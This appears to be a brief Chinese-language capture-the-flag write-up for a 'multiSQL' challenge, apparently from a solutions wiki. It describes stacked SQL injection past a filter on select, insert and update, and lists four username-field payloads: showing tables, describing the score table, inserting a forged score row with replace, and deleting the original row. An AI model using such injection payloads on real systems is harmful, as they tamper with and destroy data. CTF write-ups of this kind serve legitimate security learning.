[WEEK3]multiSQL

multiSQL，很容易联想到php的multiquery，堆叠注入其中selec,insert,update被过滤

参考链接

利用replace进行修改，插入一条新数据，再用delete删除原数据

username=%E7%81%AB%E5%8D%8E';show tables;#查数据库里所有的表
username=%E7%81%AB%E5%8D%8E';desc score;#查score表中所有字段
username=%E7%81%AB%E5%8D%8E';replace into score values("火华",200,200,200);#表中插入一条数据
username=%E7%81%AB%E5%8D%8E';delete from score where listen=11;#删除原本的数据

Previous[WEEK3]BabySSTI_One Next[WEEK4]BabySSTI_Two

Last updated 1 year ago